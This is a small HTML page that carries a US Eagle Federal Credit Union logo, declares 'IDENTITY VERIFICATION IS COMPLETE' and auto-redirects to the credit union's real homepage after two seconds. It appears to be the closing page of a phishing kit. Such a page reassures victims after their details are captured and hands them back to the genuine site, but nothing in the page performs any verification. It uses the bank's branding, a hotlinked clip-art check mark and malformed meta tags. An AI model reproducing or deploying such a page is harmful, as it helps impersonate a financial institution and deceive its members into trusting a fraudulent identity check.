<html>
<head>
        <meta http-equiv="refresh" content="2; url=https://www.useagle.org/">
        <meta charset="UTF-8">
        <meta httpequiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta httpequiv="cache-control" content="no-cache">
        <meta httpequiv="pragma" content="no-cache">
	<title></title>
</head>
<body>
<h3><img alt="" src=" https://useaglefcu.financialhost.org/Media/Default/FILogo/USEAGLE_Logo_FCU_Color_peoplemeanmore_082020.png" style="margin-right: 10px; float: left; width: 215px; height: 60px;" /></h3>

<h3>&nbsp;</h3>

<p>&nbsp;</p>

<hr />
<div style="background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px; text-align: center;">IDENTITY VERIFICATION IS COMPLETE</div>

<hr />
<p style="text-align: center;"><img alt="" src="https://www.pngall.com/wp-content/uploads/8/Green-Check-Mark-PNG-Image.png" style="width: 150px; height: 150px;" /></p>

<p style="text-align: center;">You&#39;re being redirected to Homepage.............</p>
</body>
</html>
